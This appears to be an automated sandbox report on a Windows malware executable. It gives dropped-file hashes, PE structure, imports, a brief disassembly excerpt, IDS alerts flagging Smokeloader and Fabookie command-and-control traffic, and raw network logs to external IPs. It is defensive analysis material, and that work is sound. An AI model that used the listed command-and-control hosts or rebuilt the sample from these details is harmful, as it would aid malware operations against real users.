                                                                                                                                  Preview:F........i@......mZ....`r.E.L..0&.G....D....|..?..S<.5...'<.d.)....o..............G.....E=...F..g.x^z...=....D..IdW>.....b=L.B4y.+.$..$:..c8...Y.#...1...Q.,.R.^1...,.>.4H...i.....P.q.....#~...t0{H..>.y.v6M.Y...........g.z;.[..w..<....3..~1......e.....S8.yz......YA.|J.........[.G+.[.w..pU..(...n...$.BL6...G5...LF...lK.r...n.s....~...}...%.;.C$.Y4p:n62l..aD=s".....$=.<.#.!..DYAeE..K...._.l.5...cm<.\,.......O.[+...R.:...cDc...h.T...C.Z.w.O.|...(...;........6...B.mM...^{.;.sA..........j./.|.QD..y..T-....7Ko...p.P...C..\..v<...~..2'h..&iLL.c.P1..d....H6....%$.k.........,.x......B....D.4.F.)y...B.Bg-....!......6....#i....I.....~.o.G..sB.K..Jgc....yC:..I........e.#.N..]...D./#....Q...>.k40(.....A.;......!T/.H....S..+...$>...IX.=S:...i...\.D5..s..g.+KD..Hpj.(...e.z.V.V..........c....$..Y..'...k.ZQK~.5Z......G.J.w...Y..g..k.....*x..'>.0j.3CB.......D..>.m...2.M.(F...)...^G.(.,.8@...}.....<O..4....+.JY<.....^m.B....Sd{.o..Y%.w../F.=...=~.c
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):221696
                                                                                                                                  Entropy (8bit):6.956307856034634
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:odA5Hwr1mBa2jIvgLL3APaN4Ii+WCF4BmbnXoLnkzzsPyVSl7obwqxKDYow:oi5Qd2k2L3ACN4I+Bsinmzs+WywqED
                                                                                                                                  MD5:BD0DFD6CBAE2B012D4A5F155D10ED054
                                                                                                                                  SHA1:83A8CB5B61FCAFBDFD9BFF2B0CC8C8C39F5437AD
                                                                                                                                  SHA-256:BD2433BEDDEFCCCA8BF3539FC8E5A354E988CD2A3C3AF9A27F4A3BBE4ED40731
                                                                                                                                  SHA-512:01FBC67A42B43FA7EE6E1816D44D9BD1A40672AE814F1756C79D0F7CCC2198DCC109719AF85ED887B337DF5E48504402958EE15A6420EC01533584B545E32C7E
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%..:%...%..:%...%..:%...%..:%Rich..:%........PE..L...:QKa.....................X....................@..........................0......<.......................................|...(........K..........................................................09..@............................................text............................... ..`.data...@........"..................@....rsrc....K.......L..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):222208
                                                                                                                                  Entropy (8bit):6.961464277141477
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:3mAwHwNRmc8MwxD4wuLt+oNk0A8CFoEkOREcn5R254FNdaQFPUZrNFUuK:31wKwMK0LtJNkJnRE0ZFOQFPUZ5FU
                                                                                                                                  MD5:644232606A176287A73169B177EB8752
                                                                                                                                  SHA1:0A09865B7C29D4A90F7F06AF19940580AC7E8847
                                                                                                                                  SHA-256:365904FA34452030915B29FCBF60978159E63A6240622FFD72B6D564A591BAD4
                                                                                                                                  SHA-512:D31F22B521CE18B2E15F6C955A4516392915028534DC3061C1FAF06D3F011A7984882BF10DF81B7EA23F902DCEADF8E8A7194107E423739D8809ED6D52355B47
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%..:%...%..:%...%..:%...%..:%Rich..:%........PE..L.....`.....................X....................@..........................0.......]......................................|...(........K..........................................................09..@............................................text............................... ..`.data............$..................@....rsrc....K.......L..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):26
                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\4316.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):10
                                                                                                                                  Entropy (8bit):1.6854752972273346
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:8UVVPn:8UX
                                                                                                                                  MD5:6AE945FBDC1D8D49E8594EB1B17C432B
                                                                                                                                  SHA1:2C1F954F2B1DF2F1AAF8005712713310EF007910
                                                                                                                                  SHA-256:8832E50601FD9EAAE5C32CA2E9701E9DBCAFC504D4057A1E61B252E121660938
                                                                                                                                  SHA-512:6BD303C85FB735FD7635D11B9E24AB1943EBC1A60BC8DE77CBBFA8709BEBFF7E9EA5E229D92F1038724297156DE1B3976E4B6097DC607CA3657DC3111CEB8125
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:a010001012
                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):6.961464277141477
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:file.exe
                                                                                                                                  File size:222208
                                                                                                                                  MD5:644232606a176287a73169b177eb8752
                                                                                                                                  SHA1:0a09865b7c29d4a90f7f06af19940580ac7e8847
                                                                                                                                  SHA256:365904fa34452030915b29fcbf60978159e63a6240622ffd72b6d564a591bad4
                                                                                                                                  SHA512:d31f22b521ce18b2e15f6c955a4516392915028534dc3061c1faf06d3f011a7984882bf10df81b7ea23f902dceadf8e8a7194107e423739d8809ed6d52355b47
                                                                                                                                  SSDEEP:3072:3mAwHwNRmc8MwxD4wuLt+oNk0A8CFoEkOREcn5R254FNdaQFPUZrNFUuK:31wKwMK0LtJNkJnRE0ZFOQFPUZ5FU
                                                                                                                                  TLSH:D724DF2236C0C072D22617748D61DBF4AEBBB87119756A8B7BC8077C8F752D2EE25346
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%..:%...%..:%...%..:%...%..:%Rich..:%........PE..L......`.....................X.....
                                                                                                                                  Icon Hash:aecaae9ecea62aa2
                                                                                                                                  Entrypoint:0x40a106
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x60ACCECD [Tue May 25 10:17:49 2021 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:5
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:5
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:5
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:9111c2b05e717afa2acabbf314a51e79
                                                                                                                                  Instruction
                                                                                                                                  call 00007F36886FD714h
                                                                                                                                  jmp 00007F36886F58BEh
                                                                                                                                  mov edi, edi
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                  test eax, eax
                                                                                                                                  je 00007F36886F5A54h
                                                                                                                                  sub eax, 08h
                                                                                                                                  cmp dword ptr [eax], 0000DDDDh
                                                                                                                                  jne 00007F36886F5A49h
                                                                                                                                  push eax
                                                                                                                                  call 00007F36886F51B2h
                                                                                                                                  pop ecx
                                                                                                                                  pop ebp
                                                                                                                                  ret
                                                                                                                                  mov edi, edi
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                  push esi
                                                                                                                                  mov esi, ecx
                                                                                                                                  mov byte ptr [esi+0Ch], 00000000h
                                                                                                                                  test eax, eax
                                                                                                                                  jne 00007F36886F5AA5h
                                                                                                                                  call 00007F36886F93A9h
                                                                                                                                  mov dword ptr [esi+08h], eax
                                                                                                                                  mov ecx, dword ptr [eax+6Ch]
                                                                                                                                  mov dword ptr [esi], ecx
                                                                                                                                  mov ecx, dword ptr [eax+68h]
                                                                                                                                  mov dword ptr [esi+04h], ecx
                                                                                                                                  mov ecx, dword ptr [esi]
                                                                                                                                  cmp ecx, dword ptr [004313B0h]
                                                                                                                                  je 00007F36886F5A54h
                                                                                                                                  mov ecx, dword ptr [004312C8h]
                                                                                                                                  test dword ptr [eax+70h], ecx
                                                                                                                                  jne 00007F36886F5A49h
                                                                                                                                  call 00007F36886F6F61h
                                                                                                                                  mov dword ptr [esi], eax
                                                                                                                                  mov eax, dword ptr [esi+04h]
                                                                                                                                  cmp eax, dword ptr [00431BA8h]
                                                                                                                                  je 00007F36886F5A58h
                                                                                                                                  mov eax, dword ptr [esi+08h]
                                                                                                                                  mov ecx, dword ptr [004312C8h]
                                                                                                                                  test dword ptr [eax+70h], ecx
                                                                                                                                  jne 00007F36886F5A4Ah
                                                                                                                                  call 00007F36886FD94Bh
                                                                                                                                  mov dword ptr [esi+04h], eax
                                                                                                                                  mov eax, dword ptr [esi+08h]
                                                                                                                                  test byte ptr [eax+70h], 00000002h
                                                                                                                                  jne 00007F36886F5A56h
                                                                                                                                  or dword ptr [eax+70h], 02h
                                                                                                                                  mov byte ptr [esi+0Ch], 00000001h
                                                                                                                                  jmp 00007F36886F5A4Ch
                                                                                                                                  mov ecx, dword ptr [eax]
                                                                                                                                  mov dword ptr [esi], ecx
                                                                                                                                  mov eax, dword ptr [eax+04h]
                                                                                                                                  mov dword ptr [esi+04h], eax
                                                                                                                                  mov eax, esi
                                                                                                                                  pop esi
                                                                                                                                  pop ebp
                                                                                                                                  retn 0004h
                                                                                                                                  mov edi, edi
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  sub esp, 14h
                                                                                                                                  mov eax, dword ptr [00431178h]
                                                                                                                                  xor eax, ebp
                                                                                                                                  mov dword ptr [ebp-04h], eax
                                                                                                                                  push ebx
                                                                                                                                  push esi
                                                                                                                                  xor ebx, ebx
                                                                                                                                  Programming Language:
                                                                                                                                  • [ASM] VS2008 build 21022
                                                                                                                                  • [ C ] VS2008 build 21022
                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                  • [C++] VS2008 build 21022
                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                  • [LNK] VS2008 build 21022
                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1f37c0x28.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x18e0000x4bd8.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x12800x1c.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39300x40.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x21c.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x1efb00x1f000False0.5132702242943549data6.363465614721737IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0x200000x16de000x12400False0.8686188998287672data7.516236861046921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0x18e0000x4bd80x4c00False0.7266652960526315data6.367523459296205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                  RT_ICON0x18e3100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Raeto-RomanceSwitzerland
                                                                                                                                  RT_ICON0x18ebb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Raeto-RomanceSwitzerland
                                                                                                                                  RT_ICON0x1911600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                                                                                                                                  RT_STRING0x1924380x42dataRaeto-RomanceSwitzerland
                                                                                                                                  RT_STRING0x1924800x1e6dataRaeto-RomanceSwitzerland
                                                                                                                                  RT_STRING0x1926680x3c2dataRaeto-RomanceSwitzerland
                                                                                                                                  RT_STRING0x192a300x1a4dataRaeto-RomanceSwitzerland
                                                                                                                                  RT_ACCELERATOR0x1922380x90dataRaeto-RomanceSwitzerland
                                                                                                                                  RT_GROUP_ICON0x1922080x30dataRaeto-RomanceSwitzerland
                                                                                                                                  RT_VERSION0x1922f80x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                                                                                                                                  None0x1922c80xadataRaeto-RomanceSwitzerland
                                                                                                                                  None0x1922d80xadataRaeto-RomanceSwitzerland
                                                                                                                                  None0x1922e80xadataRaeto-RomanceSwitzerland
                                                                                                                                  DLLImport
                                                                                                                                  KERNEL32.dllLoadLibraryA, ReadConsoleW, GetVolumeInformationA, GetComputerNameA, VerLanguageNameA, LocalFlags, InterlockedDecrement, SetSystemTimeAdjustment, SetLocaleInfoA, FindNextVolumeW, GetConsoleAliasExesLengthA, EnumSystemCodePagesA, FindNextFileA, CopyFileExA, MoveFileWithProgressW, VerifyVersionInfoA, LocalSize, DebugBreak, GlobalGetAtomNameA, MapViewOfFileEx, GetWindowsDirectoryA, DeleteFileA, lstrlenW, IsBadWritePtr, FindResourceA, GetComputerNameExW, GetProcAddress, GetStringTypeW, GetFileTime, GetConsoleAliasesLengthA, DeleteVolumeMountPointW, GetOEMCP, CreateIoCompletionPort, CopyFileA, lstrcpynW, WriteConsoleW, GetCommandLineW, GetProfileSectionA, WriteConsoleOutputA, SearchPathA, GetCommandLineA, FindFirstChangeNotificationA, GetCalendarInfoA, GetConsoleTitleA, CreateActCtxA, FormatMessageW, GetModuleHandleW, CreateJobObjectA, GetConsoleFontSize, FindNextVolumeA, GlobalFlags, GetCurrentConsoleFont, GetModuleHandleA, LoadLibraryW, InitializeCriticalSection, GetStringTypeExA, OpenMutexA, RtlCaptureContext, InterlockedExchange, LeaveCriticalSection, DeleteFiber, InterlockedCompareExchange, EnumDateFormatsW, EnumCalendarInfoA, GetPrivateProfileStructA, InterlockedIncrement, GetNamedPipeHandleStateW, CreateTimerQueue, LocalAlloc, GetLogicalDriveStringsW, GetTickCount, SetLastError, WideCharToMultiByte, MultiByteToWideChar, Sleep, DeleteCriticalSection, EnterCriticalSection, RtlUnwind, RaiseException, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, MoveFileA, GetStartupInfoW, LCMapStringA, LCMapStringW, GetCPInfo, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, HeapSize, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, InitializeCriticalSectionAndSpinCount, SetFilePointer, GetConsoleCP, GetConsoleMode, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, FlushFileBuffers, ReadFile, CreateFileA, CloseHandle
                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  Raeto-RomanceSwitzerland
                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                  192.168.2.545.136.151.10249702802851115 10/17/22-22:07:06.666147TCP2851115ETPRO TROJAN Win32/Fabookie.ek CnC Activity M24970280192.168.2.545.136.151.102
                                                                                                                                  192.168.2.534.91.216.4949705802039103 10/17/22-22:07:11.143612TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970580192.168.2.534.91.216.49
                                                                                                                                  192.168.2.5104.21.93.3049692802039103 10/17/22-22:06:42.842374TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4969280192.168.2.5104.21.93.30
                                                                                                                                  192.168.2.5185.174.137.17449693802018581 10/17/22-22:06:30.526719TCP2018581ET TROJAN Single char EXE direct download likely trojan (multiple families)4969380192.168.2.5185.174.137.174
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 17, 2022 22:06:27.897016048 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:27.929425001 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:27.929560900 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:27.929771900 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:27.929794073 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:27.962079048 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:27.962104082 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109186888 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109220982 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109239101 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109255075 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109273911 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109291077 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109308958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109325886 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109344006 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109361887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109378099 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109394073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109431982 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.109503984 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.154829025 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154860020 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154891014 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154911995 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154926062 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154943943 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154962063 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154983044 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155000925 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155019045 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155030966 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.155036926 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155054092 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155072927 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155091047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155101061 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.155107975 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155128002 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155145884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155145884 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.155164957 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155167103 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.155179024 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155195951 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155209064 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155222893 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.155226946 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155242920 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155252934 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.155272007 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.196872950 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.199424028 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199460983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199480057 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199498892 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199517012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199533939 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199553013 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199573040 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199589968 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199604034 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199645996 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.199733973 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200103998 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200126886 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200144053 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200160980 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200179100 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200196981 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200212002 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200238943 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200277090 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200484037 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200633049 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200654984 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200673103 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200690985 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200709105 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200726032 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200747013 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200752020 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200773954 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200793982 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200807095 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200818062 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200839996 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200843096 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200865030 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200881958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200901031 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200918913 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200922966 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200946093 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200965881 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200965881 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200989962 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.201005936 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.201013088 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.201035976 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 17, 2022 22:06:27.866137028 CEST5695353192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:06:27.890122890 CEST53569538.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:34.090620995 CEST5928753192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:06:34.107852936 CEST53592878.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:59.379132032 CEST5864853192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:06:59.397810936 CEST53586488.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:03.213567972 CEST6189353192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:03.235198021 CEST53618938.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:05.740963936 CEST6064953192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:05.758786917 CEST53606498.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:09.127866030 CEST5144153192.168.2.58.8.8.8
